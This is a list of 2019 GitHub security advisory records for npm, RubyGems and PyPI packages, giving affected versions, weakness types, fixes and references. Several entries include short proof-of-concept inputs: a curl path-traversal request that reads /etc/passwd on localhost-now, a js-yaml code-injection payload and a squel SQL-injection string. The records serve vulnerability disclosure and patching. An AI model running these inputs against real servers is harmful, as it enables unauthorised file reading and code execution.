[{'type': 'WEB', 'url': 'https://github.com/maxogden/concat-stream/pull/47'}, {'type': 'WEB', 'url': 'https://github.com/maxogden/concat-stream/pull/47/commits/3e285ba5e5b10b7c98552217f5c1023829efe69e'}, {'type': 'WEB', 'url': 'https://gist.github.com/ChALkeR/c2d2fd3f1d72d51ad883df195be03a85'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/597'}]
{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-03T17:26:24Z', 'nvd_published_at': None}
1.4.0
GHSA-crfx-5phg-hmw9
2020-08-31T18:41:52Z
2019-06-13T18:59:12Z
null
[]
Cross-Site Scripting in ids-enterprise
Versions of `ids-enterprise` prior to 4.18.2 are vulnerable to Cross-Site Scripting (XSS). Script tags in the `soho-autocomplete` component are not properly encoded and may allow attackers to execute arbitrary JavaScript. ## Recommendation Upgrade to version 4.18.2 or later
[]
[{'package': {'ecosystem': 'npm', 'name': 'ids-enterprise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.18.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/infor-design/enterprise-ng/issues/502'}, {'type': 'WEB', 'url': 'https://github.com/infor-design/enterprise/commit/ce7b335bb614a6720867abf5b8eb351deb13aed1'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/955'}]
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-13T18:47:35Z', 'nvd_published_at': None}
1.4.0
GHSA-qx4v-6gc5-f2vv
2021-02-25T17:20:28Z
2019-06-20T14:32:56Z
null
[]
Regular Expression Denial of Service
A Regular Expression Denial of Service vulnerability was discovered in esm before 3.1.0. The issue is that esm's find-indexes is using the unescaped identifiers in a regex, which, in this case, causes an infinite loop.
[]
[{'package': {'ecosystem': 'npm', 'name': 'esm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/standard-things/esm/issues/694'}, {'type': 'WEB', 'url': 'https://github.com/standard-things/esm/commit/c41e001d81a5a52b0d2d1722b1c2af04d997c05b'}]
{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-20T14:17:20Z', 'nvd_published_at': None}
1.4.0
GHSA-v2p6-4mp7-3r9v
2020-08-31T18:34:16Z
2019-06-14T16:26:22Z
null
[]
Regular Expression Denial of Service in underscore.string
Versions of `underscore.string` prior to *3.3.5* are vulnerable to Regular Expression Denial of Service (ReDoS). The function `unescapeHTML` is vulnerable to ReDoS due to an overly-broad regex. The slowdown is approximately 2s for 50,000 characters but grows exponentially with larger inputs. ## Recommendation Upgrade to version 3.3.5 or higher.
[]
[{'package': {'ecosystem': 'npm', 'name': 'underscore.string'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.5'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/epeli/underscore.string/issues/510'}, {'type': 'WEB', 'url': 'https://github.com/epeli/underscore.string/pull/517'}, {'type': 'WEB', 'url': 'https://github.com/epeli/underscore.string/commit/f486cd684c94c12db48b45d52b1472a1b9661029'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/745'}]
{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-14T16:24:01Z', 'nvd_published_at': None}
1.4.0
GHSA-886v-mm6p-4m66
2021-09-07T15:24:35Z
2019-06-05T09:48:02Z
null
[]
High severity vulnerability that affects gun
## Urgent Upgrade The static file server module included with GUN had a **serious vulnerability**: - Using `curl --path-as-is` allowed reads on any parent directory or files. This did not work via the browser or via curl without as-is option. ### Fixed This has been fixed since version `0.2019.416` and higher. ### Who Was Effected? Most NodeJS users who use the default setup, such as: - `npm start` - `node examples/http.js` - `Heroku` 1-click-deploy - `Docker` - `Now` If you have a custom NodeJS code then you are probably safe *unless* you have something like `require('http').createServer(Gun.serve(__dirname))` in it. If you have not upgraded, it is **mandatory** or else it is highly likely your environment variables and AWS (or other) keys could be leaked. ### Credit It was reported and fixed by [JK0N](https://github.com/amark/gun/pull/527), but I did not understand the `--path-as-is` condition. Joonas Loppi from [function61](http://function61.com) rediscovered it and explained the urgency to me to fix it.
[]
[{'package': {'ecosystem': 'npm', 'name': 'gun'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2019.416'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/amark/gun/security/advisories/GHSA-886v-mm6p-4m66'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-886v-mm6p-4m66'}, {'type': 'PACKAGE', 'url': 'https://github.com/amark/gun'}]
{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-06-16T21:24:52Z', 'nvd_published_at': None}
1.4.0
GHSA-4wm8-fjv7-j774
2023-08-28T13:17:43Z
2019-06-20T16:08:21Z
null
['CVE-2019-8325']
RubyGems Escape sequence injection in errors
An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since Gem::CommandManager#run calls alert_error without escaping, escape sequence injection is possible. (There are many ways to cause an error.)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'RubyGems', 'name': 'rubygems-update'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.7.9'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'rubygems-update'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-8325'}, {'type': 'WEB', 'url': 'https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rubygems-update/CVE-2019-8325.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/08/msg00027.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html'}]
{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-20T16:04:35Z', 'nvd_published_at': None}
1.4.0
GHSA-4859-gpc7-4j66
2021-08-04T20:55:57Z
2019-06-05T21:24:29Z
null
[]
Command Injection in dot
All versions of dot are vulnerable to Command Injection. The template compilation may execute arbitrary commands if an attacker can inject code in the template or if a Prototype Pollution-like vulnerability can be exploited to alter an Object's prototype.
[]
[{'package': {'ecosystem': 'npm', 'name': 'dot'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.1.2'}]}]}]
[{'type': 'WEB', 'url': 'https://hackerone.com/reports/390929'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/798'}]
{'cwe_ids': ['CWE-77'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-05T21:24:18Z', 'nvd_published_at': None}
1.4.0
GHSA-6394-6h9h-cfjg
2021-02-25T17:23:12Z
2019-06-07T21:12:35Z
null
[]
Regular Expression Denial of Service
A Regular Expression vulnerability was found in nwmatcher before 1.4.4. The fix replacing multiple repeated instances of the "\s*" pattern.
[]
[{'package': {'ecosystem': 'npm', 'name': 'nwmatcher'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.4'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/dperini/nwmatcher/commit/9dcc2b039beeabd18327a5ebaa537625872e16f0'}]
{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-07T21:11:09Z', 'nvd_published_at': None}
1.4.0
GHSA-vpq5-4rc8-c222
2020-08-31T18:36:22Z
2019-06-05T14:10:45Z
null
[]
Denial of Service in canvas
Versions of `canvas` prior to 1.6.10 are vulnerable to Denial of Service. Processing malicious JPEGs or GIFs could crash the node process. ## Recommendation Upgrade to version 1.6.10
[]
[{'package': {'ecosystem': 'npm', 'name': 'canvas'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.10'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/Automattic/node-canvas/commit/c3e4ccb1c404da01e83fe5eb3626bf55f7f55957'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/315037'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/804'}]
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-05T12:48:28Z', 'nvd_published_at': None}
1.4.0
GHSA-x9p2-fxq6-2m5f
2021-08-16T23:44:47Z
2019-06-20T14:33:07Z
null
[]
Reverse Tabnapping in swagger-ui
Versions of `swagger-ui` prior to 3.18.0 are vulnerable to [Reverse Tabnapping](https://www.owasp.org/index.php/Reverse_Tabnabbing). The package uses `target='_blank'` in anchor tags, allowing attackers to access `window.opener` for the original page. This is commonly used for phishing attacks. ## Recommendation Upgrade to version 3.18.0 or later.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'swagger-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.18.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/swagger-api/swagger-ui/pull/4789'}, {'type': 'WEB', 'url': 'https://github.com/swagger-api/swagger-ui/commit/3f4cae3334fdd492a373f4453bd03a9ebd87becf'}, {'type': 'WEB', 'url': 'https://github.com/swagger-api/swagger-ui/releases/tag/v3.18.0'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SWAGGERUI-449808'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/975'}]
{'cwe_ids': ['CWE-1022'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-20T14:13:56Z', 'nvd_published_at': None}
1.4.0
GHSA-m8fw-534v-xm85
2020-08-31T18:31:00Z
2019-06-04T15:43:29Z
null
[]
Cross-Site Scripting (XSS) in cloudcmd
Versions of `cloudcmd` before 9.1.6 are vulnerable to cross-site scripting (XSS) when listing files in a directory. The attacker must control the name of a file for this vulnerability to be exploitable. ## Recommendation Update to version 9.1.6 or later.
[]
[{'package': {'ecosystem': 'npm', 'name': 'cloudcmd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.1.6'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/coderaiser/cloudcmd/commit/23f4d4702cd3d473977285f26ea2ae7206b45f38'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/341044'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/341044)'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/642'}]
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-04T15:43:12Z', 'nvd_published_at': None}
1.4.0
GHSA-mf6x-7mm4-x2g7
2021-03-19T20:59:51Z
2019-06-20T18:22:32Z
null
['CVE-2018-21270']
Out-of-bounds Read in stringstream
All versions of `stringstream` are vulnerable to out-of-bounds read as it allocates uninitialized Buffers when number is passed in input stream on Node.js 4.x and below. ## Recommendation No fix is currently available for this vulnerability. It is our recommendation to not install or use this module if user input is being passed in to `stringstream`.
[]
[{'package': {'ecosystem': 'npm', 'name': 'stringstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.6'}]}]}]
[{'type': 'WEB', 'url': 'https://hackerone.com/reports/321670'}, {'type': 'WEB', 'url': 'https://github.com/mhart/StringStream/blob/v0.0.5/stringstream.js#L32'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/664'}]
{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-20T18:22:00Z', 'nvd_published_at': '2020-12-03T21:15:00Z'}
1.4.0
GHSA-xf5p-87ch-gxw2
2022-08-02T17:43:57Z
2019-06-05T14:10:03Z
null
[]
Marked ReDoS due to email addresses being evaluated in quadratic time
Versions of `marked` from 0.3.14 until 0.6.2 are vulnerable to Regular Expression Denial of Service. Email addresses may be evaluated in quadratic time, allowing attackers to potentially crash the node process due to resource exhaustion. ## Recommendation Upgrade to version 0.6.2 or later.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]
[{'package': {'ecosystem': 'npm', 'name': 'marked'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.3.14'}, {'fixed': '0.6.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/markedjs/marked/pull/1460'}, {'type': 'WEB', 'url': 'https://github.com/markedjs/marked/commit/b15e42b67cec9ded8505e9d68bb8741ad7a9590d'}, {'type': 'PACKAGE', 'url': 'https://github.com/markedjs/marked'}, {'type': 'WEB', 'url': 'https://github.com/markedjs/marked/releases/tag/v0.6.2'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MARKED-174116'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/812'}]
{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-05T13:50:35Z', 'nvd_published_at': None}
1.4.0
GHSA-6cc5-2vg4-cc7m
2023-08-31T09:10:55Z
2019-06-10T18:05:06Z
null
['CVE-2019-12387']
Twisted CRLF Injection
In Twisted before 19.2.1, twisted.web did not validate or sanitize URIs or HTTP methods, allowing an attacker to inject invalid characters such as CRLF.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'twisted'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '19.2.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-12387'}, {'type': 'WEB', 'url': 'https://github.com/twisted/twisted/commit/6c61fc4503ae39ab8ecee52d10f10ee2c371d7e2'}, {'type': 'PACKAGE', 'url': 'https://github.com/twisted/twisted'}, {'type': 'WEB', 'url': 'https://labs.twistedmatrix.com/2019/06/twisted-1921-released.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2G5RPDQ4BNB336HL6WW5ZJ344MAWNN7N/'}, {'type': 'WEB', 'url': 'https://twistedmatrix.com/pipermail/twisted-python/2019-June/032352.html'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4308-1/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4308-2/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2020.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00030.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00042.html'}]
{'cwe_ids': ['CWE-74', 'CWE-93'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-10T18:04:12Z', 'nvd_published_at': '2019-06-10T12:29:00Z'}
1.4.0
GHSA-73cw-jxmm-qpgh
2020-08-31T18:31:31Z
2019-06-11T16:40:48Z
null
[]
Path Traversal in localhost-now
All versions of `localhost-now` are vulnerable to path traversal. This vulnerability is a bypass to the path traversal fix introduced in version 1.0.2 Proof of concept: ``` $ curl -v --path-as-is "http://IP:5432/..././..././..././..././..././..././..././..././..././..././etc/passwd" ``` ## Recommendation No fix is currently available for this vulnerability. It is our recommendation to not install or use this module until a fix is available.
[]
[{'package': {'ecosystem': 'npm', 'name': 'localhost-now'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.2'}]}]}]
[{'type': 'WEB', 'url': 'https://hackerone.com/reports/329837'}, {'type': 'WEB', 'url': 'https://github.com/DCKT/localhost-now/blob/master/lib/app.js#L17'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/655'}]
{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-11T16:40:34Z', 'nvd_published_at': None}
1.4.0
GHSA-8j8c-7jfh-h6hx
2020-08-31T18:36:43Z
2019-06-04T20:14:07Z
null
[]
Code Injection in js-yaml
Versions of `js-yaml` prior to 3.13.1 are vulnerable to Code Injection. The `load()` function may execute arbitrary code injected through a malicious YAML file. Objects that have `toString` as key, JavaScript code as value and are used as explicit mapping keys allow attackers to execute the supplied code through the `load()` function. The `safeLoad()` function is unaffected. An example payload is `{ toString: !<tag:yaml.org,2002:js/function> 'function (){return Date.now()}' } : 1` which returns the object { "1553107949161": 1 } ## Recommendation Upgrade to version 3.13.1.
[]
[{'package': {'ecosystem': 'npm', 'name': 'js-yaml'}, 'ecosystem_specific': {'affected_functions': ['js-yaml.load']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.13.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/nodeca/js-yaml/pull/480'}, {'type': 'WEB', 'url': 'https://github.com/nodeca/js-yaml/pull/480/commits/e18afbf1edcafb7add2c4c7b22abc8d6ebc2fa61'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/813'}]
{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-04T20:13:53Z', 'nvd_published_at': None}
1.4.0
GHSA-wrw9-m778-g6mc
2020-08-31T18:29:15Z
2019-06-03T17:27:57Z
null
[]
Memory Exposure in bl
Versions of `bl` before 0.9.5 and 1.0.1 are vulnerable to memory exposure. `bl.append(number)` in the affected `bl` versions passes a number to Buffer constructor, appending a chunk of uninitialized memory ## Recommendation Update to version 0.9.5, 1.0.1 or later.
[]
[{'package': {'ecosystem': 'npm', 'name': 'bl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.5'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'bl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.1'}]}], 'versions': ['1.0.0']}]
[{'type': 'WEB', 'url': 'https://github.com/rvagg/bl/pull/22'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/596'}]
{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-03T17:23:00Z', 'nvd_published_at': None}
1.4.0
GHSA-5x32-c9mf-49cc
2023-08-28T13:16:23Z
2019-06-20T16:06:15Z
null
['CVE-2019-8320']
RubyGems Delete directory using symlink when decompressing tar
A Directory Traversal issue was discovered in RubyGems 2.7.6 and later through 3.0.2. Before making new directories or touching files (which now include path-checking code for symlinks), it would delete the target destination. If that destination was hidden behind a symlink, a malicious gem could delete arbitrary files on the user's machine, presuming the attacker could guess at paths. Given how frequently gem is run as sudo, and how predictable paths are on modern systems (/tmp, /usr, etc.), this could likely lead to data loss or an unusable system.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H'}]
[{'package': {'ecosystem': 'RubyGems', 'name': 'rubygems-update'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.6'}, {'fixed': '2.7.9'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'rubygems-update'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-8320'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/317321'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2019:1429'}, {'type': 'WEB', 'url': 'https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/rubygems/rubygems'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rubygems-update/CVE-2019-8320.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/08/msg00027.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html'}]
{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-20T16:02:48Z', 'nvd_published_at': None}
1.4.0
GHSA-fqfj-cmh6-hj49
2023-07-05T19:06:46Z
2019-06-13T16:15:56Z
null
['CVE-2019-11027']
ruby-openid SSRF via claimed_id request
Ruby OpenID (aka ruby-openid) through 2.8.0 is vulnerable to SSRF. Ruby-openid performs discovery first, and then verification. This allows an attacker to change the URL used for discovery and trick the server into connecting to the URL, which might be a private server not publicly accessible. Severity can range from medium to critical, depending on how a web application developer chose to employ the ruby-openid library. Developers who based their OpenID integration heavily on the "example app" provided by the project are at highest risk.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'RubyGems', 'name': 'ruby-openid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.9.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-11027'}, {'type': 'WEB', 'url': 'https://github.com/openid/ruby-openid/issues/122'}, {'type': 'WEB', 'url': 'https://github.com/openid/ruby-openid/commit/d181a8a2099c64365a1d24b29f6b6b646673a131'}, {'type': 'PACKAGE', 'url': 'https://github.com/openid/ruby-openid'}, {'type': 'WEB', 'url': 'https://github.com/openid/ruby-openid/releases/tag/v2.9.0'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/ruby-openid/CVE-2019-11027.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2019/10/msg00014.html'}, {'type': 'WEB', 'url': 'https://marc.info/?l=openid-security&m=155154717027534&w=2'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202003-09'}]
{'cwe_ids': ['CWE-918'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2019-06-13T15:45:16Z', 'nvd_published_at': None}
1.4.0
GHSA-q22g-8fr4-qpj4
2021-08-04T21:36:58Z
2019-06-06T15:32:15Z
null
['CVE-2019-12041']
Regular Expression Denial of Service in remarkable
lib/common/html_re.js in remarkable 1.7.1 allows Regular Expression Denial of Service (ReDoS) via a CDATA section.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'remarkable'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-12041'}, {'type': 'WEB', 'url': 'https://github.com/jonschlinkert/remarkable/issues/331'}, {'type': 'WEB', 'url': 'https://github.com/jonschlinkert/remarkable/pull/335#issuecomment-515958379'}, {'type': 'WEB', 'url': 'https://github.com/jonschlinkert/remarkable/commit/287dfbf22e70790c8b709ae37a5be0523597673c'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-REMARKABLE-174639'}]
{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-06T15:21:06Z', 'nvd_published_at': '2019-05-13T13:29:00Z'}
1.4.0
GHSA-4qhx-g9wp-g9m6
2021-09-16T21:00:23Z
2019-06-14T16:09:01Z
null
[]
Failure to sanitize quotes which can lead to sql injection in squel
All versions of `squel` are vulnerable to sql injection. The `squel` package does not properly escape user provided input when provided using the `setFields` method. This could lead to sql injection if the query was then executed. Proof of concept demonstrating the injection of a single quote into a generated sql statement from user provided input. ``` > console.log(squel.insert().into('buh').setFields({foo: "bar'baz"}).toString()); INSERT INTO buh (foo) VALUES ('bar'baz') ``` ## Recommendation There is no fix at this time and the issue has been reported publicly. Consider using another query builder that provides strong guarantees for input sanitization to prevent sql injection attacks.
[]
[{'package': {'ecosystem': 'npm', 'name': 'squel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.13.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/hiddentao/squel/issues/350'}, {'type': 'PACKAGE', 'url': 'https://github.com/hiddentao/squel'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/575'}]
{'cwe_ids': ['CWE-74', 'CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2019-06-14T16:08:38Z', 'nvd_published_at': None}
1.4.0
GHSA-gm9g-2g8v-fvxj
2021-09-16T20:59:20Z
2019-06-06T15:32:28Z
null
[]
Prototype Pollution in upmerge
All versions of `upmerge` are vulnerable to Prototype Pollution. The merge() function fails to prevent user input to alter an Object's prototype, allowing attackers to modify override properties of all objects in the application. This may lead to Denial of Service or may be chained with other vulnerabilities leading to Remote Code Execution. ## Recommendation No fix is currently available. Consider using an alternative module until a fix is made available.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'upmerge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.8'}]}]}]
[{'type': 'WEB', 'url': 'https://hackerone.com/reports/439120'}, {'type': 'PACKAGE', 'url': 'https://github.com/jazzfog/UpMerge'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-UPMERGE-174133'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/809'}]
{'cwe_ids': ['CWE-345', 'CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-06T10:04:57Z', 'nvd_published_at': None}
1.4.0
GHSA-mh37-8c3g-3fgc
2023-08-28T13:22:21Z
2019-06-20T16:06:00Z
null
['CVE-2019-8322']
RubyGems Escape sequence injection vulnerability in gem owner
An issue was discovered in RubyGems 2.6 and later through 3.0.2. The gem owner command outputs the contents of the API response directly to stdout. Therefore, if the response is crafted, escape sequence injection may occur.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'RubyGems', 'name': 'rubygems-update'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.7.9'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'rubygems-update'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-8322'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/315087'}, {'type': 'WEB', 'url': 'https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rubygems-update/CVE-2019-8322.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/08/msg00027.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html'}]
{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-20T16:00:00Z', 'nvd_published_at': None}
1.4.0
GHSA-xc7v-wxcw-j472
2020-08-31T18:29:19Z
2019-06-03T17:08:26Z
null
[]
Memory Exposure in tunnel-agent
Versions of `tunnel-agent` before 0.6.0 are vulnerable to memory exposure. This is exploitable if user supplied input is provided to the auth value and is a number. Proof-of-concept: ```js require('request')({ method: 'GET', uri: 'http://www.example.com', tunnel: true, proxy:{ protocol: 'http:', host:'127.0.0.1', port:8080, auth:USERSUPPLIEDINPUT // number } }); ``` ## Recommendation Update to version 0.6.0 or later.
[]
[{'package': {'ecosystem': 'npm', 'name': 'tunnel-agent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/request/tunnel-agent/commit/9ca95ec7219daface8a6fc2674000653de0922c0'}, {'type': 'WEB', 'url': 'https://gist.github.com/ChALkeR/fd6b2c445834244e7d440a043f9d2ff4'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/598'}]
